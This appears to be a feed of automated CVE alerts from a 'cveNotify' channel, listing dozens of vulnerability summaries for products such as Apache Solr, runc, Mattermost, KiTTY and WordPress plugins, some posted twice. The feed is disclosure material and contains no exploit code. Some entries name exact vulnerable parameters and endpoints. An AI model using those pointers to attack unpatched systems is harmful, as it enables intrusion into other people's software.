🚨 CVE-2023-46344A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks.🎖@cveNotify |
|
| 2024-02-09 20:07:25 |
🚨 CVE-2024-0325In Helix Sync versions prior to 2024.1, a local command injection was identified. Reported by Bryan Riggins.🎖@cveNotify |
|
| 2024-02-09 20:07:24 |
🚨 CVE-2023-4472Objectplanet Opinio version 7.22 and prior uses a cryptographically weak pseudo-random number generator (PRNG) coupled to a predictable seed, which could lead to an unauthenticated account takeover of any user on the application.🎖@cveNotify |
|
| 2024-02-09 19:37:38 |
🚨 CVE-2024-0287A vulnerability was found in Kashipara Food Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file itemBillPdf.php. The manipulation of the argument printid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249848.🎖@cveNotify |
|
| 2024-02-09 19:37:32 |
🚨 CVE-2024-0196A vulnerability has been found in Magic-Api up to 2.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resource/file/api/save?auto=1. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249511.🎖@cveNotify |
|
| 2024-02-09 19:37:31 |
🚨 CVE-2018-12233In the ea_get function in fs/jfs/xattr.c in the Linux kernel through 4.17.1, a memory corruption bug in JFS can be triggered by calling setxattr twice with two different extended attribute names on the same file. This vulnerability can be triggered by an unprivileged user with the ability to create files and execute programs. A kmalloc call is incorrect, leading to slab-out-of-bounds in jfs_xattr.🎖@cveNotify |
|
| 2024-02-09 19:37:26 |
🚨 CVE-2014-3181Multiple stack-based buffer overflows in the magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux kernel through 3.16.3 allow physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that provides a large amount of (1) EHCI or (2) XHCI data associated with an event.🎖@cveNotify |
|
| 2024-02-09 19:37:25 |
🚨 CVE-2013-6381Buffer overflow in the qeth_snmp_command function in drivers/s390/net/qeth_core_main.c in the Linux kernel through 3.12.1 allows local users to cause a denial of service or possibly have unspecified other impact via an SNMP ioctl call with a length value that is incompatible with the command-buffer size.🎖@cveNotify |
|
| 2024-02-09 19:07:24 |
🚨 CVE-2023-38020IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow an authenticated user to manipulate output written to log files. IBM X-Force ID: 260576.🎖@cveNotify |
|
| 2024-02-09 18:37:32 |
🚨 CVE-2023-50298Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter.When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides.An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information,then send a streaming expression using the mock server's address in "zkHost".Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions.Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.From these versions on, only zkHost values that have the same server address (regardless of chroot), will use the given ZooKeeper credentials and ACLs when connecting.🎖@cveNotify |
|
| 2024-02-09 18:37:26 |
🚨 CVE-2023-50292Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr.This issue affects Apache Solr: from 8.10.0 through 8.11.2, from 9.0.0 before 9.3.0.The Schema Designer was introduced to allow users to more easily configure and test new Schemas and configSets.However, when the feature was created, the "trust" (authentication) of these configSets was not considered.External library loading is only available to configSets that are "trusted" (created by authenticated users), thus non-authenticated users are unable to perform Remote Code Execution.Since the Schema Designer loaded configSets without taking their "trust" into account, configSets that were created by unauthenticated users were allowed to load external libraries when used in the Schema Designer.Users are recommended to upgrade to version 9.3.0, which fixes the issue.🎖@cveNotify |
|
| 2024-02-09 18:37:25 |
🚨 CVE-2023-39611An issue in Software FX Chart FX 7 version 7.0.4962.20829 allows attackers to enumerate and read files from the local filesystem by sending crafted web requests.🎖@cveNotify |
|
| 2024-02-09 18:37:24 |
🚨 CVE-2022-26531Multiple improper input validation flaws were identified in some CLI commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, VPN series firmware versions 4.30 through 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and earlier versions, that could allow a local authenticated attacker to cause a buffer overflow or a system crash via a crafted payload.🎖@cveNotify |
|
| 2024-02-09 18:07:24 |
🚨 CVE-2024-22851Directory Traversal Vulnerability in LiveConfig before v.2.5.2 allows a remote attacker to obtain sensitive information via a crafted request to the /static/ endpoint.🎖@cveNotify |
|
| 2024-02-09 17:37:35 |
🚨 CVE-2024-24776Mattermost fails to check the required permissions in the POST /api/v4/channels/stats/member_count API resulting in channel member counts being leaked to a user without permissions.🎖@cveNotify |
|
| 2024-02-09 17:37:34 |
🚨 CVE-2024-24774Mattermost Jira Plugin handling subscriptions fails to check the security level of an incoming issue or limit it based on the user who created the subscription resulting in registered users on Jira being able to create webhooks that give them access to all Jira issues.🎖@cveNotify |
|
| 2024-02-09 17:37:31 |
🚨 CVE-2024-23319Mattermost Jira Plugin fails to protect against logout CSRF allowing an attacker to post a specially crafted message that would disconnect a user's Jira connection in Mattermost only by viewing the message.🎖@cveNotify |
|
| 2024-02-09 17:37:30 |
🚨 CVE-2024-20823Implicit intent hijacking vulnerability in SamsungAccount of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.🎖@cveNotify |
|
| 2024-02-09 17:37:29 |
🚨 CVE-2024-20822Implicit intent hijacking vulnerability in AccountActivity of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.🎖@cveNotify |
|
| 2024-02-09 17:37:26 |
🚨 CVE-2024-0370The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.🎖@cveNotify |
|
| 2024-02-09 17:37:25 |
🚨 CVE-2024-0832In Telerik Reporting versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik Reporting install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.🎖@cveNotify |
|
| 2024-02-09 17:37:24 |
🚨 CVE-2024-0219In Telerik JustDecompile versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik JustDecompile install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.🎖@cveNotify |
|
| 2024-02-09 17:07:30 |
🚨 CVE-2023-6846The File Manager Pro plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 8.3.4 via the mk_check_filemanager_php_syntax AJAX function. This makes it possible for authenticated attackers, with subscriber access and above, to execute code on the server. Version 8.3.5 introduces a capability check that prevents users lower than admin from executing this function.🎖@cveNotify |
|
| 2024-02-09 17:07:26 |
🚨 CVE-2023-6808The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-09 17:07:25 |
🚨 CVE-2024-0953When a user scans a QR Code with the QR Code Scanner feature, the user is not prompted before being navigated to the page specified in the code. This may surprise the user and potentially direct them to unwanted content.🎖@cveNotify |
|
| 2024-02-09 17:07:24 |
🚨 CVE-2024-0833In Telerik Test Studio versions prior to v2023.3.1330, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik Test Studio install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.🎖@cveNotify |
|
| 2024-02-09 16:37:30 |
🚨 CVE-2024-1402Mattermost fails to check if a custom emoji reaction exists when sending it to a post and to limit the amount of custom emojis allowed to be added in a post, allowing an attacker sending a huge amount of non-existent custom emojis in a post to crash the mobile app of a user seeing the post.🎖@cveNotify |
|
| 2024-02-09 16:37:26 |
🚨 CVE-2024-24524Cross Site Request Forgery (CSRF) vulnerability in flusity-CMS v.2.33, allows remote attackers to execute arbitrary code via the add_menu.php component.🎖@cveNotify |
|
| 2024-02-09 16:37:25 |
🚨 CVE-2008-4077The CGI scripts in (1) LedgerSMB (LSMB) before 1.2.15 and (2) SQL-Ledger 2.8.17 and earlier allow remote attackers to cause a denial of service (resource exhaustion) via an HTTP POST request with a large Content-Length.🎖@cveNotify |
|
| 2024-02-09 16:07:24 |
🚨 CVE-2024-21626runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.🎖@cveNotify |
|
| 2024-02-09 15:37:31 |
🚨 CVE-2024-24774Mattermost Jira Plugin handling subscriptions fails to check the security level of an incoming issue or limit it based on the user who created the subscription resulting in registered users on Jira being able to create webhooks that give them access to all Jira issues.🎖@cveNotify |
|
| 2024-02-09 15:37:30 |
🚨 CVE-2024-23319Mattermost Jira Plugin fails to protect against logout CSRF allowing an attacker to post a specially crafted message that would disconnect a user's Jira connection in Mattermost only by viewing the message.🎖@cveNotify |
|
| 2024-02-09 15:37:26 |
🚨 CVE-2024-0935Insertion of Sensitive Information into Log File vulnerabilities are affecting DELMIA Apriso Release 2019 through Release 2024🎖@cveNotify |
|
| 2024-02-09 15:37:25 |
🚨 CVE-2024-24566Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4.🎖@cveNotify |
|
| 2024-02-09 15:07:24 |
🚨 CVE-2024-23502Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in InfornWeb Posts List Designer by Category – List Category Posts Or Recent Posts allows Stored XSS.This issue affects Posts List Designer by Category – List Category Posts Or Recent Posts: from n/a through 3.3.2.🎖@cveNotify |
|
| 2024-02-09 14:37:38 |
🚨 CVE-2023-39683Cross Site Scripting (XSS) vulnerability in EasyEmail v.4.12.2 and before allows a local attacker to execute arbitrary code via the user input parameter(s). NOTE: Researcher claims issue is present in all versions prior and later than tested version.🎖@cveNotify |
|
| 2024-02-09 14:37:31 |
🚨 CVE-2023-31506A cross-site scripting (XSS) vulnerability in Grav versions 1.7.44 and before, allows remote authenticated attackers to execute arbitrary web scripts or HTML via the onmouseover attribute of an ISINDEX element.🎖@cveNotify |
|
| 2024-02-09 14:37:30 |
🚨 CVE-2024-0657The Internal Link Juicer: SEO Auto Linker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings such as 'ilj_settings_field_links_per_page' in all versions up to, and including, 2.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-02-09 14:37:29 |
🚨 CVE-2023-51761In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could bypass authentication and acquire admin capabilities.🎖@cveNotify |
|
| 2024-02-09 14:37:26 |
🚨 CVE-2023-46687In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could execute arbitrary commands in root context from a remote computer.🎖@cveNotify |
|
| 2024-02-09 14:37:25 |
🚨 CVE-2024-1112Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument.🎖@cveNotify |
|
| 2024-02-09 14:37:24 |
🚨 CVE-2023-6780An integer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a very long message, leading to an incorrect calculation of the buffer size to store the message, resulting in undefined behavior. This issue affects glibc 2.37 and newer.🎖@cveNotify |
|
| 2024-02-09 13:37:30 |
🚨 CVE-2024-25312Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'id' parameter at "School/sub_delete.php?id=5."🎖@cveNotify |
|
| 2024-02-09 13:37:29 |
🚨 CVE-2024-25309Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'pass' parameter at School/teacher_login.php.🎖@cveNotify |
|
| 2024-02-09 13:37:26 |
🚨 CVE-2024-25308Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'name' parameter at School/teacher_login.php.🎖@cveNotify |
|
| 2024-02-09 13:37:25 |
🚨 CVE-2024-25304Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'apass' parameter at "School/index.php."🎖@cveNotify |
|
| 2024-02-09 13:37:24 |
🚨 CVE-2023-6724Authorization Bypass Through User-Controlled Key vulnerability in Software Engineering Consultancy Machine Equipment Limited Company Hearing Tracking System allows Authentication Abuse.This issue affects Hearing Tracking System: before for IOS 7.0, for Android Latest release 1.0.🎖@cveNotify |
|
| 2024-02-09 11:37:32 |
🚨 CVE-2024-1035A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function uploadIcon of the file /application/index/controller/Icon.php. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252310 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-09 11:37:26 |
🚨 CVE-2024-1034A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadFile of the file /application/index/controller/File.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252309 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-09 11:37:25 |
🚨 CVE-2024-1006A vulnerability was found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This issue affects some unknown processing of the file application/index/common.php of the component Cookie Handler. The manipulation of the argument Nod_User_Id/Nod_User_Token leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252275. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-09 11:37:24 |
🚨 CVE-2024-1005A vulnerability has been found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This vulnerability affects unknown code of the file /runtime/log. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-09 10:37:25 |
🚨 CVE-2024-1264A vulnerability has been found in Juanpao JPShop up to 1.5.02 and classified as critical. Affected by this vulnerability is the function actionUpdate of the file /api/controllers/common/UploadsController.php. The manipulation of the argument imgage leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253003.🎖@cveNotify |
|
| 2024-02-09 10:37:24 |
🚨 CVE-2024-1263A vulnerability, which was classified as critical, was found in Juanpao JPShop up to 1.5.02. Affected is the function actionUpdate of the file /api/controllers/merchant/shop/PosterController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-253002 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-09 08:37:29 |
🚨 CVE-2024-24308SQL Injection vulnerability in Boostmyshop (boostmyshopagent) module for Prestashop versions 1.1.9 and before, allows remote attackers to escalate privileges and obtain sensitive information via changeOrderCarrier.php, relayPoint.php, and shippingConfirmation.php.🎖@cveNotify |
|
| 2024-02-09 08:37:26 |
🚨 CVE-2024-23749KiTTY versions 0.76.1.13 and before is vulnerable to command injection via the filename variable, occurs due to insufficient input sanitization and validation, failure to escape special characters, and insecure system calls (at lines 2369-2390). This allows an attacker to add inputs inside the filename variable, leading to arbitrary code execution.🎖@cveNotify |
|
| 2024-02-09 08:37:25 |
🚨 CVE-2024-25004KiTTY versions 0.76.1.13 and before is vulnerable to a stack-based buffer overflow via the username, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.🎖@cveNotify |
|
| 2024-02-09 08:37:24 |
🚨 CVE-2024-25003KiTTY versions 0.76.1.13 and before is vulnerable to a stack-based buffer overflow via the hostname, occurs due to insufficient bounds checking and input sanitization. This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.🎖@cveNotify |
|
| 2024-02-09 07:37:26 |
🚨 CVE-2024-25003KiTTY versions 0.76.1.13 and before has a stack-based buffer overflow where the hostname is vulnerable to a stack-based buffer overflow, occurs due to insufficient bounds checking and input sanitization. This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.🎖@cveNotify |
|
| 2024-02-09 07:37:25 |
🚨 CVE-2023-39683Cross Site Scripting (XSS) vulnerability in EasyEmail v.4.12.2 and before allows a local attacker to execute arbitrary code via the user input parameter(s). NOTE: Researcher claims issue is present in all versions prior and later than tested version.🎖@cveNotify |
|
| 2024-02-09 07:37:24 |
🚨 CVE-2023-31506A cross-site scripting (XSS) vulnerability in Grav versions 1.7.44 and before, allows remote authenticated attackers to execute arbitrary web scripts or HTML via the onmouseover attribute of an ISINDEX element.🎖@cveNotify |
|
| 2024-02-09 05:37:25 |
🚨 CVE-2024-1122The Event Manager, Events Calendar, Events Tickets for WooCommerce – Eventin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_data() function in all versions up to, and including, 3.3.50. This makes it possible for unauthenticated attackers to export event data.🎖@cveNotify |
|
| 2024-02-09 05:37:24 |
🚨 CVE-2024-0657The Internal Link Juicer: SEO Auto Linker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings such as 'ilj_settings_field_links_per_page' in all versions up to, and including, 2.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-02-09 04:37:25 |
🚨 CVE-2023-46687In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could execute arbitrary commands in root context from a remote computer.🎖@cveNotify |
|
| 2024-02-09 04:37:24 |
🚨 CVE-2023-43609In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could obtain access to sensitive information or cause a denial-of-service condition.🎖@cveNotify |
|
| 2024-02-09 03:37:43 |
🚨 CVE-2005-2946The default configuration on OpenSSL before 0.9.8 uses MD5 for creating message digests instead of a more cryptographically strong algorithm, which makes it easier for remote attackers to forge certificates with a valid certificate authority signature.🎖@cveNotify |
|
| 2024-02-09 03:37:42 |
🚨 CVE-2004-0366SQL injection vulnerability in the libpam-pgsql library before 0.5.2 allows attackers to execute arbitrary SQL statements.🎖@cveNotify |
|
| 2024-02-09 03:37:41 |
🚨 CVE-2003-1229X509TrustManager in (1) Java Secure Socket Extension (JSSE) in SDK and JRE 1.4.0 through 1.4.0_01, (2) JSSE before 1.0.3, (3) Java Plug-in SDK and JRE 1.3.0 through 1.4.1, and (4) Java Web Start 1.0 through 1.2 incorrectly calls the isClientTrusted method when determining server trust, which results in improper validation of digital certificate and allows remote attackers to (1) falsely authenticate peers for SSL or (2) incorrectly validate signed JAR files.🎖@cveNotify |
|
| 2024-02-09 03:37:37 |
🚨 CVE-2003-0721Integer signedness error in rfc2231_get_param from strings.c in PINE before 4.58 allows remote attackers to execute arbitrary code via an email that causes an out-of-bounds array access using a negative number.🎖@cveNotify |
|
| 2024-02-09 03:37:36 |
🚨 CVE-2002-2227Buffer underflow in ssldump 0.9b2 and earlier allows remote attackers to cause a denial of service (memory corruption) via a crafted SSLv2 challenge value.🎖@cveNotify |
|
| 2024-02-09 03:37:31 |
🚨 CVE-2002-0862The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS.🎖@cveNotify |
|
| 2024-02-09 03:37:30 |
🚨 CVE-2001-1339Beck IPC GmbH IPC@CHIP telnet service does not delay or disconnect users from the service when bad passwords are entered, which makes it easier for remote attackers to conduct brute force password guessing attacks.🎖@cveNotify |
|
| 2024-02-09 03:37:26 |
🚨 CVE-1999-1324VAXstations running Open VMS 5.3 through 5.5-2 with VMS DECwindows or MOTIF do not properly disable access to user accounts that exceed the break-in limit threshold for failed login attempts, which makes it easier for attackers to conduct brute force password guessing.🎖@cveNotify |
|
| 2024-02-09 03:37:25 |
🚨 CVE-1999-0046Buffer overflow of rlogin program using TERM environmental variable.🎖@cveNotify |
|
| 2024-02-09 03:07:38 |
🚨 CVE-2022-45918ILIAS before 7.16 allows External Control of File Name or Path.🎖@cveNotify |
|
| 2024-02-09 03:07:37 |
🚨 CVE-2015-8854The marked package before 0.3.4 for Node.js allows attackers to cause a denial of service (CPU consumption) via unspecified vectors that trigger a "catastrophic backtracking issue for the em inline rule," aka a "regular expression denial of service (ReDoS)."🎖@cveNotify |
|
| 2024-02-09 03:07:36 |
🚨 CVE-2008-4905Typo 5.1.3 and earlier uses a hard-coded salt for calculating password hashes, which makes it easier for attackers to guess passwords via a brute force attack.🎖@cveNotify |
|
| 2024-02-09 03:07:32 |
🚨 CVE-2008-0166OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.🎖@cveNotify |
|
| 2024-02-09 03:07:31 |
🚨 CVE-2007-0897Clam AntiVirus ClamAV before 0.90 does not close open file descriptors under certain conditions, which allows remote attackers to cause a denial of service (file descriptor consumption and failed scans) via CAB archives with a cabinet header record length of zero, which causes a function to return without closing a file descriptor.🎖@cveNotify |
|
| 2024-02-09 03:07:26 |
🚨 CVE-2005-2088The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."🎖@cveNotify |
|
| 2024-02-09 03:07:25 |
🚨 CVE-2001-08306tunnel 0.08 and earlier does not properly close sockets that were initiated by a client, which allows remote attackers to cause a denial of service (resource exhaustion) by repeatedly connecting to and disconnecting from the server.🎖@cveNotify |
|
| 2024-02-09 02:37:33 |
🚨 CVE-2011-4107The simplexml_load_string function in the XML import plug-in (libraries/import/xml.php) in phpMyAdmin 3.4.x before 3.4.7.1 and 3.3.x before 3.3.10.5 allows remote authenticated users to read arbitrary files via XML data containing external entity references, aka an XML external entity (XXE) injection attack.🎖@cveNotify |
|
| 2024-02-09 02:37:26 |
🚨 CVE-2008-2951Open redirect vulnerability in the search script in Trac before 0.10.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the q parameter, possibly related to the quickjump function.🎖@cveNotify |
|
| 2024-02-09 02:37:25 |
🚨 CVE-2005-4206Blackboard Learning and Community Portal System in Academic Suite 6.3.1.424, 6.2.3.23, and other versions before 6 allows remote attackers to redirect users to other URLs and conduct phishing attacks via a modified url parameter to frameset.jsp, which loads the URL into a frame and causes it to appear to be part of a valid page.🎖@cveNotify |
|
| 2024-02-09 02:37:24 |
🚨 CVE-2005-2089Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."🎖@cveNotify |
|
| 2024-02-09 02:07:38 |
🚨 CVE-2024-20002In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961715; Issue ID: DTV03961715.🎖@cveNotify |
|
| 2024-02-09 02:07:31 |
🚨 CVE-2024-24754Bref enable serverless PHP on AWS Lambda. When Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed and its content added in the `$files` or `$parsedBody` arrays. The conversion process produces a different output compared to the one of plain PHP when keys ending with and open square bracket ([) are used. Based on the application logic the difference in the body parsing might lead to vulnerabilities and/or undefined behaviors. This vulnerability is patched in 2.1.13.🎖@cveNotify |
|
| 2024-02-09 02:07:30 |
🚨 CVE-2024-24753Bref enable serverless PHP on AWS Lambda. When Bref is used in combination with an API Gateway with the v2 format, it does not handle multiple values headers. If PHP generates a response with two headers having the same key but different values only the latest one is kept. If an application relies on multiple headers with the same key being set for security reasons, then Bref would lower the application security. For example, if an application sets multiple `Content-Security-Policy` headers, then Bref would just reflect the latest one. This vulnerability is patched in 2.1.13.🎖@cveNotify |
|
| 2024-02-09 02:07:26 |
🚨 CVE-2024-24752Bref enable serverless PHP on AWS Lambda. When Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed and for each which contains a file, it is extracted and saved in `/tmp` with a random filename starting with `bref_upload_`. The flow mimics what plain PHP does but it does not delete the temporary files when the request has been processed. An attacker could fill the Lambda instance disk by performing multiple MultiPart requests containing files. This vulnerability is patched in 2.1.13.🎖@cveNotify |
|
| 2024-02-09 02:07:25 |
🚨 CVE-2024-23650BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit client or frontend could craft a request that could lead to BuildKit daemon crashing with a panic. The issue has been fixed in v0.12.5. As a workaround, avoid using BuildKit frontends from untrusted sources.🎖@cveNotify |
|
| 2024-02-09 01:37:32 |
🚨 CVE-2023-33064Transient DOS in Audio when invoking callback function of ASM driver.🎖@cveNotify |
|
| 2024-02-09 01:37:26 |
🚨 CVE-2023-33060Transient DOS in Core when DDR memory check is called while DDR is not initialized.🎖@cveNotify |
|
| 2024-02-09 01:37:25 |
🚨 CVE-2023-33046Memory corruption in Trusted Execution Environment while deinitializing an object used for license validation.🎖@cveNotify |
|
| 2024-02-09 01:07:38 |
🚨 CVE-2023-5992A vulnerability was found in OpenSC where PKCS#1 encryption padding removal is not implemented as side-channel resistant. This issue may result in the potential leak of private data.🎖@cveNotify |
|
| 2024-02-09 01:07:32 |
🚨 CVE-2023-7043Unquoted service path in ESET products allows to drop a prepared program to a specific location and run on boot with the NT AUTHORITY\NetworkService permissions.🎖@cveNotify |
|
| 2024-02-09 01:07:31 |
🚨 CVE-2024-23170An issue was discovered in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2. There was a timing side channel in RSA private operations. This side channel could be sufficient for a local attacker to recover the plaintext. It requires the attacker to send a large number of messages for decryption, as described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario.🎖@cveNotify |
|
| 2024-02-09 01:07:30 |
🚨 CVE-2024-22236In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.🎖@cveNotify |
|
| 2024-02-09 01:07:26 |
🚨 CVE-2021-1782A race condition was addressed with improved locking. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited..🎖@cveNotify |
|
| 2024-02-09 01:07:25 |
🚨 CVE-2005-2456Array index overflow in the xfrm_sk_policy_insert function in xfrm_user.c in Linux kernel 2.6 allows local users to cause a denial of service (oops or deadlock) and possibly execute arbitrary code via a p->dir value that is larger than XFRM_POLICY_OUT, which is used as an index in the sock->sk_policy array.🎖@cveNotify |
|
| 2024-02-09 00:37:32 |
